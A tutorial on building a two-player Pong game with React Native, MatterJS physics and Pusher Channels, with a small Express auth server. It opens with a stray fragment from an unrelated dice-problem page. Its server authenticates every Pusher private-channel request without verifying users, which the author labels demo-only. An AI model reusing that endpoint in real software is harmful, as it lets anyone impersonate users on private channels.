Therefore, the number of ways to get sum 8 with 3 dice having 5 faces is 18. | https://iq.opengenus.org/dice-throw-problem/ | CC-MAIN-2021-43 | refinedweb | 1,206 | 71.99 |
I hate putting stuff in the registry. It's not portable, it just adds bulk that's only needed by my application, and it's problematic to back up in case you want to move the app to another machine or easily recover from a reformat/reinstall of Windows. However, every time I mention "put it in an INI file", all of the zealots here on CP complain that INI files are obsolete, and we should always use the registry. Yeah, right, blah blah blah.
I will however admit that INI files are limited in their functionality in a number of ways. They can't be bigger than 64k in size, and data items can be no longer than 256 characters. They can also be difficult to use if you want to do anything more than simply setting/getting data from them. Finally, Microsoft could, at any time, remove the API functions that support them. These are the primary reasons that I wrote the CProfile class.
CProfile
This class reads XML files that are formatted in a style similar to INI files. In other words, given the following INI file contents:
[GENERAL]
setting1=0
setting2=test
[SPECIAL]
setting1=spider
setting2=0.12345
... the XML version supported by CProfile would look like this:
<xml>
  <GENERAL>
    <setting1>0</setting1>
    <setting2>test</setting2>
  </GENERAL>
  <SPECIAL>
    <setting1>spider</setting1>
    <setting2>0.12345</setting2>
  </SPECIAL>
</xml>
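The mapping is purely mechanical: each (section, key, value) triple becomes a top-level element, a child element under it, and that child's text. Here is a portable sketch of that mapping in standard C++ (no MFC or MSXML involved; the `Item` struct and `toXml` helper are my own names, not part of CProfile):

```cpp
#include <cassert>
#include <string>
#include <vector>

// One profile item, mirroring the three strings CProfile stores per entry:
// section, key name, and value.
struct Item { std::string section, key, value; };

// Emit the INI-style triples in the XML shape described above:
// one top-level element per section, one child element per key.
std::string toXml(const std::vector<Item>& items) {
    std::string xml = "<xml>";
    std::string open;                        // section element currently open
    for (const Item& it : items) {
        if (it.section != open) {
            if (!open.empty()) xml += "</" + open + ">";
            xml += "<" + it.section + ">";   // start a new section element
            open = it.section;
        }
        xml += "<" + it.key + ">" + it.value + "</" + it.key + ">";
    }
    if (!open.empty()) xml += "</" + open + ">";
    return xml + "</xml>";
}
```

Feeding it the two GENERAL entries from the example produces the same `<GENERAL>` block shown above, just without the pretty-printing.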
Since the class is simply trying to emulate the functionality of INI files, all top-level nodes are considered to be equivalent to INI sections, and each "section" contains one or more child nodes (the same thing as INI "keys"). Child nodes under the keys are ignored - remember, we're just emulating INI files, not an all-encompassing XML file reader. I kept this within the context of an INI file because that's all I need. If you want to make this all-encompassing, have at it, but don't ask me to do it for you. You're a programmer - make it fit your needs.
CProfile maintains a CTypedPtrArray of profile items. Each profile item contains three CStrings - its section, its key name, and its value. Converting to and from the desired intrinsic type is handled in a series of overloaded Set/Get functions.
The class uses MSXML.DLL and imports the typelib. This way, I don't have to worry about any weird (and often unreliable) XML parsing classes that may only partially implement what's needed to properly parse a XML file. The only thing you have to remember to do is to call CoInitialize() before you call the CProfile::Load() function (and remember to call CoUninitialize() before exiting your app). I just stick a call to CoInitialize() at the top of my InitInstance() function, and CoUninitialize() in my ExitInstance() function - nice and tidy.
Using CProfile is a simple matter of creating a variable somewhere in your application like so:
#include "Profile.h"
CProfile m_profile;
...and then loading the file:
m_profile.Load("");
When you call CProfile::Load(), you need to supply a string that represents a file name. If the filename is blank or is not a complete path/filename, the class will attempt to "normalize" the filename in the following ways:
In the end, an acceptable filename should always be the result. The file does not have to exist, but the path must.
After the profile is loaded, you can access the data. If you attempt to retrieve a value whose section/key does not yet exist, that section/key/value is added to the list of values maintained within CProfile. If you try to set a section/key/value that doesn't exist, it will be automatically created and added to the list.
By default, CProfile will automatically save its data when it goes out of scope. If you don't want this functionality, simply include this line anytime within the current scope.
CProfile::SetAutoSave(false);
The class will not save until either you explicitly call the Save() function, or the CProfile object goes out of scope (and auto-save is turned on).
Save()
By default, if you try to get or set a value for a key that doesn't exist, CProfile will automatically create the key in the list. This duplicates the functionality of the Get/SetPrivateProfileString API for INI files. However, you can turn that functionality on and off for sets, gets, or both by calling the appropriate toggle function:
CProfile::SetAddOnFailedGets(bool)
CProfile::SetAddOnFailedSets(bool)
The default value is true for both toggles.
If you want to make sure that your xml file loaded as expected, there are two built-in functions in CProfile that show the contents of the internal list - ShowContentsByRange() and ShowContentsBySection().
ShowContentsByRange()
ShowContentsBySection()
The "ByRange" function allows you to view all of the items within the specified index range. If you don't pass any range info at all, it assumes you want to see all of the items. Normally this shouldn't be a problem, but just in case you have a billion keys, you can specify a smaller range of items to view.
ByRange
The "BySection" function shows all keys for the specified section. Again, this shouldn't normally be a problem, but if you have over 25 keys in a given section, you should consider writing an overload of this function that also accepts a non-optional set of range parameters.
BySection
I've also included some code that supports filename manipulation. It is provided only to support CProfile and discussion of that code is not within the context of this article. Feel free to talk amongst yourselves, but I won't be fielding any questions about it.
So there it is - nothing fancy and definitely not hard to use or understand. I'm sure there's something in this code that someone won't like, so instead of complaining about it, be a programmer and change it to suit your needs. Good luck.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
"C:\Program Files\<application>\Setup.xml"
Setup.ini
Mike O`Neill wrote:Under Vista, however, for standard users, the Vista UAC security model locks down directories like C:/Program Files etc. In other words, programs are not supposed to create/modify files like "C:\Program Files\\Setup.xml" (or Setup.ini).
For continued support of legacy applications, Microsoft implemented the idea of "UAC virtualization", where files are not stored where the program thinks they're stored. See, for example, A Closer Look at Windows Vista, Part I: Security Changes[^].
Mike O`Neill wrote:For those of us who truly deplore the over-use of the registry, what should we do in the future?
Mike O`Neill wrote:Microsoft has warned developers that we should not depend on the existence of UAC virtualization in future releases of Windows, and that we should start to "fit in" to their preferred model of initialization (i.e., the registry).
<Settings>
<GLOBAL>
<Setting1>setting1</Setting1>
<Setting3>
<Value>one</Value>
<Value>two</Value>
<Value>three</Value>
</Setting3>
</GLOBAL>
</Settings>
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/17353/XML-Application-Profile-Class?fid=379856&df=90&mpp=10&noise=1&prof=True&sort=Position&view=Expanded&spc=None | CC-MAIN-2015-18 | refinedweb | 1,223 | 60.95 |
Create a two-player Pong game with React Native
You will need Node 11+, Yarn and React Native 0.57.8+ installed on your machine.
In this tutorial, we’ll re-create the classic video game “Pong”. For those unfamiliar, Pong is short for Ping-pong. It’s another term for table tennis in which two players hit a lightweight ball back and forth across a table using small rackets. So Pong is basically the video game equivalent of the sport.
Prerequisites
Basic knowledge of React Native and React Navigation is required. We’ll also be using Node, but knowledge is optional since we’ll only use it minimally.
We’ll be using the following package versions:
- Yarn 1.13.0
- Node 11.2.0
- React Native 0.57.8
- React Native Game Engine 0.10.1
- MatterJS 0.14.2
For compatibility reasons, I recommend you to install the same package versions used in this tutorial before trying to update to the latest ones.
We’ll be using Pusher Channels in this tutorial. So you should know how to create and set up a new app instance on their website. The only requirement is for the app to allow client events. You can enable it from your app settings page.
Lastly, you’ll need an ngrok account, so you can use it for exposing the server to the internet.
App overview
We’ll re-create the Pong game with React Native and Pusher Channels. Users have to log in using a unique username before they can start playing the game. The server is responsible for signaling for when an opponent is found and when the game starts. Once in the game, all the users have to do is land the ball on their opponent’s base and also prevent them from landing the ball on their base. For the rest of the tutorial, I’ll be referring to the object which the users will move as “plank”.
Here’s what it will look like:
You can find the code on this GitHub repo.
Creating the app
Start by initializing a new React Native project:
react-native init RNPong
cd RNPong
Once the project is created, open your package.json file and add the following to your dependencies:
"dependencies": { "matter-js": "^0.14.2", "pusher-js": "^4.3.1", "react-native-game-engine": "^0.10.1", "react-native-gesture-handler": "^1.0.12", "react-navigation": "^3.0.9", // your existing dependencies.. }
Execute yarn install to install the packages.
While that’s doing its thing, here’s a brief overview of what each package does:
- matter-js - a JavaScript physics engine. This allows us to simulate how objects respond to applied forces and collisions. It’s responsible for animating the ball and the planks as they move through space.
- pusher-js - used for sending realtime messages between the two users so the UI stays in sync.
- react-native-game-engine - provides useful components for effectively managing and rendering the objects in our game. As you’ll see later, it’s the one which orchestrates the different objects so they can be managed by a system which specifies how the objects will move or react to collisions.
- react-navigation - for handling navigation between the login and the game screen.
- react-native-gesture-handler - you might think that we’re using it for handling the swiping motion for moving the planks. But the truth is we don’t really need this directly. react-navigation uses it for handling gestures when navigating between pages.
Once that's done, link all the packages with react-native link.
Next, set the permission to access the network state and set the orientation to landscape:
// android/app/src/main/AndroidManifest.xml <manifest ...> <uses-permission android: <uses-permission android: <uses-permission android: <application android:name=".MainApplication" ... > <activity android:name=".MainActivity" android:screenOrientation="landscape" ... > ... </activity> </application> </manifest>
React Navigation boilerplate code
Start by adding the boilerplate code for setting up React Navigation. This includes the main app file and the root file for specifying the app screens:
// App.js import React, { Component } from "react"; import { View } from "react-native"; import Root from "./Root"; export default class App extends Component { render() { return ( <View style={styles.container}> <Root /> </View> ); } } const styles = { container: { flex: 1 } }; // Root.js import React, { Component } from "react"; import { YellowBox } from 'react-native'; import { createStackNavigator, createAppContainer } from "react-navigation"; import LoginScreen from './src/screens/Login'; import GameScreen from './src/screens/Game'; // to suppress timer warnings (has to do with Pusher) YellowBox.ignoreWarnings([ 'Setting a timer' ]); const RootStack = createStackNavigator( { Login: LoginScreen, Game: GameScreen }, { initialRouteName: "Login" } ); const AppContainer = createAppContainer(RootStack); class Router extends Component { render() { return ( <AppContainer /> ); } } export default Router;
If you don’t know what’s going on with the code above, be sure to check out the React Navigation docs.
Login screen
We’re now ready to add the code for the login screen of the app. Start by importing the things we need. If you haven’t created a Pusher app instance yet, now is a good time to do so. Then replace the placeholders below. As for the ngrok URL, you can add it later once we run the app:
// src/screens/Login.js import React, { Component } from "react"; import { View, Text, TextInput, TouchableOpacity, Alert } from "react-native"; import Pusher from 'pusher-js/react-native'; const pusher_app_key = 'YOUR PUSHER APP KEY'; const pusher_app_cluster = 'YOUR PUSHER APP CLUSTER'; const base_url = 'YOUR HTTPS NGROK URL';
Next, initialize the state and instance variables that we’ll be using:
class LoginScreen extends Component { static navigationOptions = { title: "Login" }; state = { username: "", enteredGame: false }; constructor(props) { super(props); this.pusher = null; this.myChannel = null; } // next: add render method }
In the render method, we have the login form. While the user hasn't entered the game, we show a text field for the username and a Login button; once they do, we show a loading text (the style names below refer to the styles file linked later in this section):

render() {
  return (
    <View style={styles.container}>
      {!this.state.enteredGame && (
        <View>
          <TextInput
            style={styles.textInput}
            placeholder="Enter your username"
            onChangeText={username => this.setState({ username })}
            value={this.state.username}
          />
          <TouchableOpacity onPress={this.enterGame}>
            <Text style={styles.button}>Login</Text>
          </TouchableOpacity>
        </View>
      )}
      {this.state.enteredGame && <Text>Loading...</Text>}
    </View>
  );
}
When the Login button is clicked, we authenticate the user through the server. This is a requirement for Pusher apps that communicate directly from the client side. So to save on requests, we also submit the username as an additional request parameter. Once the app receives a response from the server, we subscribe to the current user's own channel. This allows the app to receive messages from the server, and from their opponent later on:
enterGame = async () => { const username = this.state.username; if (username) { this.setState({ enteredGame: true // show loading text }); this.pusher = new Pusher(pusher_app_key, { authEndpoint: `${base_url}/pusher/auth`, cluster: pusher_app_cluster, auth: { params: { username: username } }, encrypted: true }); this.myChannel = this.pusher.subscribe(`private-user-${username}`); this.myChannel.bind("pusher:subscription_error", status => { Alert.alert( "Error", "Subscription error occurred. Please restart the app" ); }); this.myChannel.bind("pusher:subscription_succeeded", () => { // next: add code for when the opponent is found }); } };
When the opponent-found event is triggered by the server, this is the cue for the app to navigate to the game screen. But before that, we first subscribe to the opponent's channel and determine which objects should be assigned to the current user. The game is set up in a way that the first player who logs in is always considered "player one", and the next one is always "player two". Player one always assumes the left side of the screen, while player two assumes the right side. Each player has a plank and a wall assigned to them. Most of the code below is used to determine which objects should be assigned to the current player:
this.myChannel.bind("opponent-found", data => { let opponent = username == data.player_one ? data.player_two : data.player_one; const playerOneObjects = { plank: "plankOne", wall: "leftWall", plankColor: "green" }; const playerTwoObjects = { plank: "plankTwo", wall: "rightWall", plankColor: "blue" }; const isPlayerOne = username == data.player_one ? true : false; const myObjects = isPlayerOne ? playerOneObjects : playerTwoObjects; const opponentObjects = isPlayerOne ? playerTwoObjects : playerOneObjects; const myPlank = myObjects.plank; const myPlankColor = myObjects.plankColor; const opponentPlank = opponentObjects.plank; const opponentPlankColor = opponentObjects.plankColor; const myWall = myObjects.wall; const opponentWall = opponentObjects.wall; Alert.alert("Opponent found!", `Your plank color is ${myPlankColor}`); this.opponentChannel = this.pusher.subscribe( `private-user-${opponent}` ); this.opponentChannel.bind("pusher:subscription_error", data => { console.log("Error subscribing to opponent's channel: ", data); }); this.opponentChannel.bind("pusher:subscription_succeeded", () => { this.props.navigation.navigate("Game", { pusher: this.pusher, username: username, myChannel: this.myChannel, opponentChannel: this.opponentChannel, opponent: opponent, isPlayerOne: isPlayerOne, myPlank: myPlank, opponentPlank: opponentPlank, myPlankColor: myPlankColor, opponentPlankColor: opponentPlankColor, myWall: myWall, opponentWall: opponentWall }); }); this.setState({ username: "", enteredGame: false }); });
Next, add the styles for the login screen. You can get it from this file.
Server code
Create a server folder inside the root of the React Native project. Inside, create a package.json file with the following contents:
{ "name": "pong-authserver", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "start": "node server.js" }, "author": "", "license": "ISC", "dependencies": { "body-parser": "^1.17.2", "dotenv": "^4.0.0", "express": "^4.15.3", "pusher": "^1.5.1" } }
Execute yarn install to install the dependencies.
Next, create a .env file and add your Pusher app credentials:
APP_ID="YOUR PUSHER APP ID" APP_KEY="YOUR PUSHER APP KEY" APP_SECRET="YOUR PUSHER APP SECRET" APP_CLUSTER="YOUR PUSHER APP CLUSTER"
Next, import all the packages we need and initialize Pusher:
// server/server.js var express = require('express'); var bodyParser = require('body-parser'); var Pusher = require('pusher'); require('dotenv').config(); var app = express(); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); var pusher = new Pusher({ appId: process.env.APP_ID, key: process.env.APP_KEY, secret: process.env.APP_SECRET, cluster: process.env.APP_CLUSTER, });
Next, we add the route for authenticating the user. I said authentication, but to simplify things, we're going to skip the actual authentication. Normally, you would have a database for checking whether the user has a valid account before you call the pusher.authenticate method:
var users = []; app.post("/pusher/auth", function(req, res) { var socketId = req.body.socket_id; var channel = req.body.channel_name; var username = req.body.username; users.push(username); // temporarily store the username to be used later console.log(username + " logged in"); var auth = pusher.authenticate(socketId, channel); res.send(auth); });
Next, add the route for triggering the event for informing the users that an opponent was found. When you access this route on the browser, it will show an alert on both devices that an opponent is found, and the game screen will show up. Again, this isn't what you'd do in a production app. This is only a demo, so this is done to have finer control over when things are triggered:

app.get("/opponent-found", function(req, res) {
  var player_one = users[0];
  var player_two = users[1];
  var data = {
    player_one: player_one,
    player_two: player_two
  };
  // trigger the event on both players' private channels
  pusher.trigger("private-user-" + player_one, "opponent-found", data);
  pusher.trigger("private-user-" + player_two, "opponent-found", data);
  res.send("Opponent found!");
});
Lastly, the start game route is what triggers the ball to actually start moving:

app.get("/start-game", function(req, res) {
  // only player one needs this event; they are responsible for serving the ball
  pusher.trigger("private-user-" + users[0], "start-game", {});
  res.send("Game started!");
});

// run the server on a specific port
var port = 5000;
app.listen(port);
Game screen
Let’s go back the app itself. This time, we proceed to coding the game screen. Start by importing the packages and components we need:
// src/screens/Game.js import React, { PureComponent } from 'react'; import { View, Text, Alert } from "react-native"; import { GameEngine } from "react-native-game-engine"; import Matter from "matter-js"; import Circle from '../components/Circle'; // for rendering the ball import Box from '../components/Box'; // for rendering the planks and walls
Next, we declare the size of the objects. Here, we're using hard-coded dimensions to constrain the world to a single size, because someone might be playing the game on a tablet while their opponent plays on a phone with a small screen. Without fixed dimensions, the ball would travel longer distances on the tablet compared to the phone, and the UI wouldn't be perfectly synced:
const BALL_SIZE = 50;
const PLANK_HEIGHT = 70;
const PLANK_WIDTH = 20;
const GAME_WIDTH = 650;
const GAME_HEIGHT = 340;
const BALL_START_POINT_X = GAME_WIDTH / 2 - BALL_SIZE;
const BALL_START_POINT_Y = GAME_HEIGHT / 2;
const BORDER = 15;
const WINNING_SCORE = 5;
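The tutorial keeps things simple by hard-coding the world size. If you later wanted to render that fixed world on differently sized screens, one approach is to compute a uniform scale factor and map world coordinates to screen coordinates. This is just a sketch; worldToScreen is a hypothetical helper, not part of the tutorial's code:

```javascript
// Map a point in the fixed 650x340 game world onto a device screen
// by scaling uniformly (so the aspect ratio is preserved).
function worldToScreen(worldX, worldY, screenW, screenH, gameW = 650, gameH = 340) {
  const scale = Math.min(screenW / gameW, screenH / gameH);
  return { x: worldX * scale, y: worldY * scale, scale };
}

// A 1300x680 screen is exactly twice the game world:
console.log(worldToScreen(650, 340, 1300, 680)); // { x: 1300, y: 680, scale: 2 }
```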
Next, we specify the properties of the objects in the game. These properties decide how they move through space and respond to collisions with other objects:
const plankSettings = { isStatic: true }; const wallSettings = { isStatic: true }; const ballSettings = { inertia: 0, friction: 0, frictionStatic: 0, frictionAir: 0, restitution: 1 };
Here’s what each property does. Note that most of these properties are only applicable to the ball. All the ones applied to other objects are simply used to replace the default values:
- isStatic - used for specifying that the object is immovable. This means that it won’t change position no matter the amount of force applied to it by another object.
- inertia - the amount of external force it takes to move a specific object. We're specifying a value of 0 for the ball so it requires no force at all to move it.
- friction - used for specifying the kinetic friction of the object. This can have a value between 0 and 1. A value of 0 means that the object doesn't produce any friction when it slides through another object which also has a friction of 0, so when a force is applied to it, it will simply slide indefinitely until another force stops it. 1 is the maximum amount of friction, and any value in between controls the amount of friction it produces as it slides through or collides with another object. For the ball, we're specifying a friction of 0 so it can move indefinitely.
- frictionStatic - aside from inertia, this is another property you can use to specify how much harder it will be to move a static object. A higher value will require a greater amount of force to move the object.
- frictionAir - used for specifying the air resistance of an object. We're specifying a value of 0 so the ball can move indefinitely through space even if it doesn't collide with anything.
- restitution - used for specifying the bounce of the ball when it collides with walls and planks. It can have a value between 0 and 1. 0 means it won't bounce at all when it collides with another object, while 1 produces the maximum amount of bounce.
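To build intuition for how restitution and frictionAir shape the ball's motion, here's a tiny self-contained 1D simulation in plain JavaScript. It is independent of MatterJS, and the numbers are purely illustrative:

```javascript
// Simulate a ball moving along one axis with air friction and wall bounces.
function simulate(steps, { frictionAir = 0, restitution = 1 }) {
  let x = 0;
  let v = 5;
  for (let i = 0; i < steps; i++) {
    v *= 1 - frictionAir; // air resistance slows the ball each step
    x += v;
    if (x > 100) { x = 100; v = -v * restitution; } // bounce off the right wall
    if (x < 0)   { x = 0;   v = -v * restitution; } // bounce off the left wall
  }
  return { x, v };
}

// With no air friction and full restitution, the speed never decays:
const ideal = simulate(1000, { frictionAir: 0, restitution: 1 });
console.log(Math.abs(ideal.v)); // 5

// With air friction, the ball eventually grinds to a halt:
const damped = simulate(1000, { frictionAir: 0.05, restitution: 1 });
console.log(Math.abs(damped.v) < 0.001); // true
```

This is why the tutorial sets frictionAir and friction to 0 with restitution 1: the ball keeps its speed forever and only changes direction when it hits something.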
Next, create the actual objects using the settings from earlier. In MatterJS, we can create objects using the Matter.Bodies module. We can create different shapes using the methods in this module, but for the purpose of this tutorial, we only need to create a circle (ball) and a rectangle (planks and walls). The circle and rectangle methods both require the initial x and y position of the object as their first and second arguments. As for the third one, the circle method requires the radius of the circle, while the rectangle method requires the width and the height. The last argument is the object's properties we declared earlier. In addition, we're also specifying a label to make it easy to determine the object we're working with. isSensor is set to true for the left and right walls so they will only act as sensors for collisions instead of affecting the object which collides with them. This means that the ball will simply pass through those walls:
const ball = Matter.Bodies.circle( BALL_START_POINT_X, BALL_START_POINT_Y, BALL_SIZE, { ...ballSettings, label: "ball" } ); const plankOne = Matter.Bodies.rectangle( BORDER, 95, PLANK_WIDTH, PLANK_HEIGHT, { ...plankSettings, label: "plankOne" } ); const plankTwo = Matter.Bodies.rectangle( GAME_WIDTH - 50, 95, PLANK_WIDTH, PLANK_HEIGHT, { ...plankSettings, label: "plankTwo" } ); const topWall = Matter.Bodies.rectangle( GAME_HEIGHT - 20, -30, GAME_WIDTH, BORDER, { ...wallSettings, label: "topWall" } ); const bottomWall = Matter.Bodies.rectangle( GAME_HEIGHT - 20, GAME_HEIGHT + 33, GAME_WIDTH, BORDER, { ...wallSettings, label: "bottomWall" } ); const leftWall = Matter.Bodies.rectangle(-50, 160, 10, GAME_HEIGHT, { ...wallSettings, isSensor: true, label: "leftWall" }); const rightWall = Matter.Bodies.rectangle( GAME_WIDTH + 50, 160, 10, GAME_HEIGHT, { ...wallSettings, isSensor: true, label: "rightWall" } ); const planks = { plankOne: plankOne, plankTwo: plankTwo };
Next, we add all the objects to the “world”. In MatterJS, all objects that you need to interact with one another need to be added to the world. This allows them to be simulated by the “engine”. The engine is used for updating the simulation of the world:
const engine = Matter.Engine.create({ enableSleeping: false }); const world = engine.world; Matter.World.add(world, [ ball, plankOne, plankTwo, topWall, bottomWall, leftWall, rightWall ]);
In the above code, enableSleeping is set to false to prevent the objects from sleeping. This is a state similar to adding the isStatic property to the object; the only difference is that objects that are asleep can be woken up and continue their motion. As you'll see later on, we're actually going to make the ball sleep manually as a technique for keeping the UI synced.
Next, create the component and initialize the state. Note that we're using a PureComponent instead of the usual Component. This is because the game screen needs to be pretty performant. PureComponent automatically handles the shouldComponentUpdate method for you. When props or state changes, PureComponent will do a shallow comparison on both props and state, and the component won't actually re-render if nothing has changed:
export default class Game extends PureComponent { static navigationOptions = { header: null // we don't need a header }; state = { myScore: 0, opponentScore: 0 }; // next: add constructor }
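The shallow comparison PureComponent performs can be sketched like this. This is a simplified illustration, not React's actual implementation:

```javascript
// Shallow equality: same keys, and each value identical by reference (===).
function shallowEqual(a, b) {
  const keysA = Object.keys(a);
  const keysB = Object.keys(b);
  if (keysA.length !== keysB.length) return false;
  return keysA.every(key => a[key] === b[key]);
}

console.log(shallowEqual({ myScore: 0 }, { myScore: 0 }));   // true - primitives compare by value
console.log(shallowEqual({ scores: [0] }, { scores: [0] })); // false - new array reference each time
```

The second case is why state like myScore and opponentScore is kept as plain numbers here: shallow comparison can tell when they actually change, so re-renders stay cheap.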
The constructor is where we specify the systems to be used by the React Native Game Engine and subscribe the user to their opponent’s channel. Start by getting all the navigation params that we passed from the login screen earlier:
constructor(props) { super(props); const { navigation } = this.props; this.movePlankInterval = null; this.pusher = navigation.getParam("pusher"); this.username = navigation.getParam("username"); this.myChannel = navigation.getParam("myChannel"); this.opponentChannel = navigation.getParam("opponentChannel"); this.isPlayerOne = navigation.getParam("isPlayerOne"); const myPlankName = navigation.getParam("myPlank"); const opponentPlankName = navigation.getParam("opponentPlank"); this.myPlank = planks[myPlankName]; this.opponentPlank = planks[opponentPlankName]; this.myPlankColor = navigation.getParam("myPlankColor"); this.opponentPlankColor = navigation.getParam("opponentPlankColor"); this.opponentWall = navigation.getParam("opponentWall"); this.myWall = navigation.getParam("myWall"); const opponent = navigation.getParam("opponent"); // next: add code for adding systems }
Next, add the systems for the physics engine and moving the plank. The React Native Game Engine doesn't come with a physics engine out of the box, thus we use MatterJS to handle the physics of the game. Later on, in the component's render method, we will pass physics and movePlank as systems:
this.physics = (entities, { time }) => { let engine = entities["physics"].engine; engine.world.gravity.y = 0; // no downward pull Matter.Engine.update(engine, time.delta); // move the simulation forward return entities; }; this.movePlank = (entities, { touches }) => { let move = touches.find(x => x.type === "move"); if (move) { const newPosition = { x: this.myPlank.position.x, // x is constant y: this.myPlank.position.y + move.delta.pageY // add the movement distance to the current Y position }; Matter.Body.setPosition(this.myPlank, newPosition); } return entities; }; // next: add code for binding to events for syncing the UI
All the entities (the objects we added earlier) that are added to the world are passed to each of the systems. Each entity has properties like time and touches which you can manipulate. In the case of the physics engine, the engine itself is considered an entity. In the code above, we're setting the world's Y gravity (downward pull) to zero. This means that the objects won't be pulled downwards as the simulation goes on.

The movePlank system is used for moving the plank, so we extract the touches from the entities. touches contains an array of all the touches the user performed. Each item in the array contains all sorts of data about the touch, but we're only concerned with the type. The type can be touch, press, or in this case, move. move is when the user moves their finger/s across the screen. Since we only need to listen for this one event, we don't actually need to target the plank precisely. This means that the user doesn't have to place their index finger on their assigned plank in order to move it. They simply have to move their finger across the screen, and the distance from that movement will automatically be added to the current Y position of their plank. Of course, this considers the direction of the movement as well, so if the direction is upwards, then the value of move.delta.pageY will be negative.
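The touch handling described above boils down to accumulating vertical deltas into the plank's Y position. Here's that idea as a small pure function; applyTouches is a hypothetical helper, not part of the tutorial's code:

```javascript
// Apply a stream of touch events to a plank's Y position.
// Only "move" events matter; downward swipes have a positive pageY delta.
function applyTouches(plankY, touches) {
  for (const t of touches) {
    if (t.type === "move") {
      plankY += t.delta.pageY;
    }
  }
  return plankY;
}

console.log(
  applyTouches(95, [
    { type: "move", delta: { pageY: -10 } }, // swipe up
    { type: "press" },                       // ignored
    { type: "move", delta: { pageY: 4 } }    // small swipe down
  ])
); // 89
```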
Next, we bind to the events that will be triggered by the opponent. These will keep the UI of the two players synced. First is the event for syncing the planks. This updates the UI to show the current position of the opponent’s plank:
this.myChannel.bind("client-opponent-moved", opponentData => { Matter.Body.setPosition(this.opponentPlank, { x: this.opponentPlank.position.x, y: opponentData.opponentPlankPositionY }); }); // next: listen to the event for moving the ball
Next, add the event which updates the ball's current position and velocity. The way this works is that the two players will continuously pass the ball's current position and velocity to one another. Between each pass, we add a 200-millisecond delay so that the ball actually moves between each pass. Making the ball sleep between each pass is important because, otherwise, the ball will look like it's going back and forth a few millimeters while it's reaching its destination:
this.myChannel.bind("client-moved-ball", ({ position, velocity }) => { Matter.Sleeping.set(ball, false); // awaken the ball so it can move Matter.Body.setPosition(ball, position); Matter.Body.setVelocity(ball, velocity); setTimeout(() => { if (position.x != ball.position.x || position.y != ball.position.y) { this.opponentChannel.trigger("client-moved-ball", { position: ball.position, velocity: ball.velocity }); Matter.Sleeping.set(ball, true); // make the ball sleep while waiting for the event to be triggered by the opponent } }, 200); }); // next: add code for sending plank updates to the opponent
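The reason position and velocity are enough to keep both screens in sync is that, with gravity and friction disabled, the ball's path is deterministic: given the same starting point and velocity, both clients advance it identically. A minimal sketch of that extrapolation (extrapolate is a hypothetical helper):

```javascript
// With no gravity, friction, or air resistance, the ball moves linearly
// between collisions, so its future position is fully determined by
// its current position and velocity.
function extrapolate(position, velocity, steps) {
  return {
    x: position.x + velocity.x * steps,
    y: position.y + velocity.y * steps
  };
}

// Ball at mid-court moving right at 3 units per step, after 10 steps:
console.log(extrapolate({ x: 275, y: 170 }, { x: 3, y: 0 }, 10)); // { x: 305, y: 170 }
```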
Next, trigger the event for updating the opponent’s screen of the current position of the user’s plank. This is executed every 300 milliseconds so we’re still within the 10 messages per second limit per client:
setInterval(() => { this.opponentChannel.trigger("client-opponent-moved", { opponentPlankPositionY: this.myPlank.position.y }); }, 300); // next: add code for updating player two's score
Next, we bind to the event for updating the scores on player two’s side. Player one (the first user who logs in) is responsible for triggering this event:
if (!this.isPlayerOne) { this.myChannel.bind( "client-update-score", ({ playerOneScore, playerTwoScore }) => { this.setState({ myScore: playerTwoScore, opponentScore: playerOneScore }); } ); } // next: add componentDidMount
Once the component is mounted, we wait for the start-game event to be triggered by the server before accelerating the ball. Once the ball is accelerated, we initiate the back and forth passing of the ball's position and velocity. This is the reason why only player one runs this code:
componentDidMount() { if (this.isPlayerOne) { this.myChannel.bind("start-game", () => { Matter.Body.setVelocity(ball, { x: 3, y: 0 }); // throw the ball straight to the right this.opponentChannel.trigger("client-moved-ball", { position: ball.position, velocity: ball.velocity }); Matter.Sleeping.set(ball, true); // make the ball sleep and wait for the same event to be triggered on this side }); // next: add scoring code } }
Next, we need to handle collisions. We already know that the ball can collide with any of the objects we added into the world. But if it hits either the left wall or right wall, the player who hit it will score a point. And since this block of code is still within the this.isPlayerOne condition, we also need to trigger an event for informing player two of the score change:
Matter.Events.on(engine, "collisionStart", event => { var pairs = event.pairs; var objA = pairs[0].bodyA.label; var objB = pairs[0].bodyB.label; if (objA == "ball" && objB == this.opponentWall) { this.setState( { myScore: +this.state.myScore + 1 }, () => { // bring back the ball to its initial position Matter.Body.setPosition(ball, { x: BALL_START_POINT_X, y: BALL_START_POINT_Y }); Matter.Body.setVelocity(ball, { x: -3, y: 0 }); // inform player two of the change in scores this.opponentChannel.trigger("client-update-score", { playerOneScore: this.state.myScore, playerTwoScore: this.state.opponentScore }); } ); } else if (objA == "ball" && objB == this.myWall) { this.setState( { opponentScore: +this.state.opponentScore + 1 }, () => { Matter.Body.setPosition(ball, { x: BALL_START_POINT_X, y: BALL_START_POINT_Y }); Matter.Body.setVelocity(ball, { x: 3, y: 0 }); this.opponentChannel.trigger("client-update-score", { playerOneScore: this.state.myScore, playerTwoScore: this.state.opponentScore }); } ); } });
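The scoring decision inside that collision handler boils down to comparing labels. Here's the same logic as a small pure function, which makes it easy to reason about (and test) separately from MatterJS; scorer and its arguments are hypothetical names for this sketch:

```javascript
// Decide who scores from a collision pair's labels.
// Landing the ball on the opponent's wall scores a point for "me";
// any other collision (top/bottom walls, planks) scores for no one.
function scorer(labelA, labelB, myWall, opponentWall) {
  if (labelA !== "ball") return null;
  if (labelB === opponentWall) return "me";
  if (labelB === myWall) return "opponent";
  return null;
}

// Player one's wall is "leftWall", so hitting "rightWall" is their point:
console.log(scorer("ball", "rightWall", "leftWall", "rightWall")); // "me"
console.log(scorer("ball", "topWall", "leftWall", "rightWall"));   // null
```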
Next, add the render function. The majority of the rendering is taken care of by the React Native Game Engine. To render the objects, we pass them as the value for the entities prop. This accepts an object containing all the objects that we want to render. The only required properties for an object are the body and the renderer; the rest are props to be passed to the renderer itself. Note that you also need to pass the engine and the world as entities:
